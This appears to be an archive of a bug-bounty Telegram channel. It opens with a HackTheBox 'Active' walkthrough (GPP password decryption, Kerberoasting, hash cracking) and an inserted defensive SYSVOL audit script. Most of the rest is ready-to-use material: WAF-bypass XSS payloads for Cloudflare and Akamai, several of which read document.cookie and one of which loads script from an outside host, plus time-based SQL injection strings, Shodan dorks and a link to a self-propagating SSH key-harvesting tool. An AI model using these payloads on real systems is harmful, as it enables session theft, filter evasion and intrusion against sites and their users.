Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5,853 subscribers
Post archive
Summary of my Active machine CTF notes for 10.10.10.100, with commands and examples:

1. Nmap scan:
```bash
nmap -sV 10.10.10.100
```
Identified critical ports like 53 (DNS), 88 (Kerberos), 139/445 (NetBIOS), and 389 (LDAP).

2. SMB enumeration:
- enum4linux for detailed information:
```bash
enum4linux -a 10.10.10.100
```
- SMBMap to check share permissions:
```bash
smbmap -H 10.10.10.100
```

3. Access and download from the Replication share:
- Accessed via smbclient and downloaded Groups.xml (the smbmap -A pattern has to match the file name, so Groups.xml rather than Groups.txt):
```bash
smbclient //10.10.10.100/Replication
smbmap -R Replication -H 10.10.10.100 -A Groups.xml
```

4. Decrypting the password in Groups.xml:
- Used gpp-decrypt on the encrypted password:
```bash
gpp-decrypt [encrypted_password]
```

5. Using the credentials:
- Accessed SMB with the decrypted password:
```bash
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p [Decrypted_Password]
smbclient //10.10.10.100/Users -U 'active.htb\SVC_TGS%[Decrypted_Password]'
```

6. Kerberos ticket extraction and cracking:
- Extracted Kerberos tickets:
```bash
GetUserSPNs.py -request -dc-ip 10.10.10.100 'active.htb/SVC_TGS' -save -outputfile GetUserSPNs.out
```
- Cracked the tickets with Hashcat:
```bash
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt
```

7. Root access:
- Accessed the admin share and retrieved root.txt:
```bash
smbclient //10.10.10.100/c$ -U 'active.htb\administrator%[Cracked_Password]'
```
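The weakness behind steps 3 and 4 is a Group Policy Preferences file in SYSVOL that still carries a cpassword attribute. The following is an added example, not part of the original notes: a defender-side audit that walks a SYSVOL copy and reports every GPP XML file with a non-empty cpassword so it can be removed, without decrypting anything. The SYSVOL layout, the GUID placeholder and the Groups.xml content in the demo are constructed.

```python
# Added example (not from the original post): find GPP files in SYSVOL that still
# store a cpassword attribute. Assumes SYSVOL, or an offline copy, is readable.
import os
import tempfile
import xml.etree.ElementTree as ET

# The GPP XML files Microsoft's MS14-025 guidance names as able to hold cpassword
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


def find_cpasswords(sysvol_root):
    """Return (file path, element tag, userName, cpassword length) per finding."""
    findings = []
    for dirpath, _, filenames in os.walk(sysvol_root):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed XML: skip it rather than abort the audit
            # cpassword sits on the <Properties> child of each preference item
            for elem in root.iter():
                cpw = elem.get("cpassword")
                if cpw:  # an empty cpassword="" means no password is stored
                    findings.append((path, elem.tag, elem.get("userName", ""), len(cpw)))
    return findings


def demo():
    """Constructed SYSVOL layout: one offending Groups.xml, one clean Drives.xml."""
    root = tempfile.mkdtemp()
    prefs = os.path.join(root, "Policies", "{GUID-PLACEHOLDER}", "Machine", "Preferences")
    os.makedirs(os.path.join(prefs, "Groups"))
    with open(os.path.join(prefs, "Groups", "Groups.xml"), "w") as f:
        f.write('<Groups><User name="svc"><Properties action="U" userName="svc" '
                'cpassword="AAAAAAAA"/></User></Groups>')  # constructed value
    with open(os.path.join(prefs, "Drives.xml"), "w") as f:
        f.write('<Drives><Drive name="H:"><Properties path="\\\\fs\\home" '
                'cpassword=""/></Drive></Drives>')
    return find_cpasswords(root)


if __name__ == "__main__":
    for path, tag, user, n in demo():
        print(f"{path}: <{tag}> userName={user!r} has a {n}-char cpassword; remove it")
```

Point find_cpasswords at a real SYSVOL mount to audit a domain; each reported file should be fixed by deleting the preference item and rotating the account's password.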

summary of this machine is here

A new try, let me know your thoughts guys

Anyone playing CTF on HackTheBox?


Unleash Your API Potential! 🌟 Dive deep into JSON API security with our expert cheat sheet. Elevate your bug bounty game! #StayAheadOfTheCurve #APISecurityMasterclass https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-7

Unlock the Code to Cybersecurity Mastery! 🌐✨ Dive into my top 5 strategies for becoming an industry expert. Your journey to excellence starts now!

Quick tip to find reflected XSS by Coffinxp:
1. python3 paramspider.py --domain domain.com
2. cat domain.com.txt | kxss | grep "< >" | tee unfiltered_param.txt
3. Inject a simple XSS payload: "><img src=x onerror=alert("XSS")>

Payloads 💰
- <style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt${document.domain}>
- <marquee+loop=1+width=0+onfinish='new+Functional\ert\1\``'>
- <d3v/onauxclick=[2].some(confirm)>click
- <x onauxclick=a=alert,a(domain)>click
- q=1" type=image sr>c<=x one>ror<="alert> (alert')
- <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> (Chrome only)
- ?id=1&id=2 ⬇️ <input value="1,2">
- ?id="&id=onpointerrawupdate="a=confirm&id=a(1) ⬇️ <input value="", onpointerrawupdate="a=confirm, a(1)">
- Payload: %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[al+ert](1)%3E%23leet%3C/marquee%3E
- FOR CHROME: %3Cx%20y=1%20z=%271%26apos;%27onclick=self[al%2Bert](1)%3E%23CLICK%20MEE

Akamai XSS Bypass:
Cloudflare XSS Bypass:
- <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
- <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
- </ScRiPt><img src=something onauxclick="new Function al\ert\xss\``">
- "><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
- link=qwe"srcdoc="\u003ce<script%26Tab;src=//dom.xss>\u003ce</script%26Tab;e>
- javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")

Angular 1.4.3 CSTI XSS Akamai WAF:
{{([].toString()).constructor.prototype.charAt=[].join;$eval(([].toString()).constructor.fromCodePoint([120],[61],[49],[125],[125],[125],[59],[97],[108],[101],[114],[116],[40],[49],[41],[47],[47]));}}

<details open ontoggle="{alert1}"></details>

Cloudflare WAF Bypass - XSS (still works - when only=1 didn't):
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

Midnight hunting payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Payload: <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==")>

Reflected Cross-Site Scripting (XSS) and HTML Injection
- Vulnerable URL: https[:]//exampledesk[.]example[.]com/helpdesk/logon.asp?URL=%22%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
- Vulnerable parameter: URL=
- Payload: "></script><script>alert(document.cookie)</script>

Yet Another Cloudflare WAF Bypass - #XSS
<a"/onclick=(confirm)(origin)>Click Here!
Worked for me yesterday, quite well.

Another SQL injection payload:
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515

Reflected XSS to RCE payload: "><img src=x onerror=alert(whoami)>

Cloudflare WAF Bypass ⚡️
<a"/onclick=(confirm)(origin)>Click Here!

Time sleep SQL injection ⚡️
Payload: 'XOR(if(now()=sysdate(),sleep(33),0))OR'

🔖Akamai XSS WAF Bypass (src, svg, autofocus, iframe, img, <>)
You use this payload: %22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22

CloudFlare Bypass [XSS]
Payload: <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

onscrollend payload for Chrome and Firefox:
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:50px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>

XSS-Bypass Anatomy
Final payload after working hours on a bug bounty target w/ both XSS filters & WAF:
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A

<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>

SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of #SSH private key and host discovery. https://github.com/MegaManSec/SSH-Snake


In the intricate tapestry of hacking, each thread is a line of code, weaving together to form a hidden story. It's a journey through the uncharted, where curiosity meets the mastery of skill, and every challenge is a step closer to revelation

Unlocking the Secrets of Secure API Design: Discover essential strategies in our latest guide. Dive into diverse authentication methods and their security impacts. Equip yourself with the knowledge to build robust and secure APIs. #APISecurity #CybersecurityTips #TechInsights https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-6

Level up your security game with our Upload Function Cheat Sheet! 🚀 Perfect for bug bounty hunters and cybersecurity enthusiasts looking to master the intricacies of secure file uploads. Get ready to secure your digital space! https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-5

Some Shodan dorks that might be useful in bug bounty:
1. org:"target.com"
2. http.status:"<status_code>"
3. product:"<Product_Name>"
4. port:<Port_Number> "Service_Message"
5. port:<Port_Number> "Service_Name"
6. http.component:"<Component_Name>"
7. http.component_category:"<Component_Category>"
8. http.waf:"<firewall_name>"
9. http.html:"<Name>"
10. http.title:"<Title_Name>"
11. ssl.alpn:"<Protocol>"
12. http.favicon.hash:"<Favicon_Hash>"
13. net:"<Net_Range>" (e.g. 104.16.100.52/32)
14. ssl.cert.subject.cn:"<Domain.com>"
15. asn:"<ASnumber>"
16. hostname:"<hostname>"
17. ip:"<IP_Address>"
18. all:"<Keyword>"
19. "Set-Cookie: phpMyAdmin"
20. "Set-Cookie: lang="
21. "Set-Cookie: PHPSESSID"
22. "Set-Cookie: webvpn"
23. "Set-Cookie:webvpnlogin=1"
24. "Set-Cookie:webvpnLang=en"
25. "Set-Cookie: mongo-express="
26. "Set-Cookie: user_id="
27. "Set-Cookie: phpMyAdmin="
28. "Set-Cookie: _gitlab_session"
29. "X-elastic-product: Elasticsearch"
30. "x-drupal-cache"
31. "access-control-allow-origin"
32. "WWW-Authenticate"
33. "X-Magento-Cache-Debug"
34. "kbn-name: kibana"

🚨Bounty Tips Collected From Twitter🚨.pdf (2.26 KB)

Unlock the secrets of API security with Part 4 of our API Security Cheat Sheet! 🛡️ Dive into this comprehensive guide to master JSON API techniques and fortify your web applications. Perfect for bug bounty hunters and cybersecurity enthusiasts! #APISecurity #BugBounty #JSONAPI https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-4